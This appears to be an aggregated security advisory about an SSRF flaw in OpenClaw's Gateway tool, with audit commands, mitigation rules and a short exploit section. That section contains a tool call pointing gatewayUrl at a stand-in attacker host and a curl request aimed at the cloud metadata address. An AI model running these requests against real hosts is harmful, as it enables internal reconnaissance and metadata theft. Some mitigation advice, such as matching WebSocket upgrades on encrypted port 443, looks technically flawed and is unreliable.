Listen to this Post
The Gateway tool in OpenClaw versions up to 2026.2.13 contains a vulnerability where it accepts a tool-supplied `gatewayUrl` without sufficient validation or allowlisting. This flaw allows an attacker who can invoke certain tools to force the OpenClaw host to initiate outbound WebSocket connections to arbitrary user-specified targets, including internal network services like localhost, private IP addresses, or cloud metadata endpoints. The issue stems from tool call paths passing the override directly to the Gateway WebSocket client. While typically requiring authenticated access, this can lead to network probing and potential further interaction if the target supports WebSockets. The fix, implemented in commit c5406e1d2434be2ef6eb4d26d8f1798d718713f4, restricts overrides to the loopback address or the configured gateway URL, rejecting disallowed protocols, credentials, and non-root paths .
Platform:
npm (openclaw)
Version:
<= 2026.2.13
Vulnerability:
SSRF/Unvalidated URL
Severity:
High
Date:
2026-02-17
Prediction:
Next npm release
What Undercode Say:
Analytics
To identify if your OpenClaw instance is vulnerable or has been targeted, you can analyze logs for suspicious WebSocket connection attempts. The following commands can help audit your system:
Check OpenClaw logs for outbound connections to non-gateway IPs sudo journalctl -u openclaw-gateway | grep -E "ws://|wss://" | grep -v "allowed.gateway.com" Monitor active connections from the OpenClaw process for unusual destinations sudo lsof -p $(pgrep openclaw) | grep ESTABLISHED Search for gatewayUrl parameters in local access logs that point to external domains grep -E "gatewayUrl=(http|ws)" /var/log/openclaw/access.log | grep -v "127.0.0.1"
How Exploit:
An attacker who can invoke a tool that accepts a `gatewayUrl` parameter can exploit this by setting it to a malicious endpoint. Below is a conceptual example of how the override might be triggered:
Example of a malicious tool call that exploits the vulnerability openclaw tool call --name some-tool --param gatewayUrl="wss://attacker.com/websocket-path"
A more direct simulation of the exploit using `curl` against a local instance could look like this:
Attempt to force a connection to an internal service (e.g., cloud metadata IP)
curl -X POST http://localhost:18789/api/tool/call \
-H "Content-Type: application/json" \
-d '{"tool":"someTool", "parameters":{"gatewayUrl":"http://169.254.169.254/latest/meta-data/"}}'
Protection from this CVE
To protect your OpenClaw installation, immediately update to version `2026.2.14` or later once released. In the meantime, implement strict network controls to mitigate the risk.
Update OpenClaw to the patched version when available npm install -g openclaw@latest Iptables rule to block outbound WebSocket connections from OpenClaw to unauthorized networks iptables -A OUTPUT -m owner --uid-owner $(id -u openclaw) -p tcp --dport 80 -m string --string "Upgrade: websocket" --algo bm -j DROP iptables -A OUTPUT -m owner --uid-owner $(id -u openclaw) -p tcp --dport 443 -m string --string "Upgrade: websocket" --algo bm -j DROP Enforce outbound connection restrictions at the application level via config Add to your OpenClaw config file (~/.config/openclaw/config.toml): [bash] allowed_gateway_urls = ["wss://your-gateway.example.com", "ws://localhost:18789"]
Impact
In a standard deployment, this vulnerability allows an attacker to use the OpenClaw host as a proxy to perform limited network reconnaissance. They can probe for reachable services on internal networks, localhost, or cloud metadata services. If a target is reachable and speaks the WebSocket protocol, further unintended interaction may be possible . For environments where the tool caller can observe the results (e.g., error messages or timing), the issue becomes an information disclosure vector that maps internal network topology.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

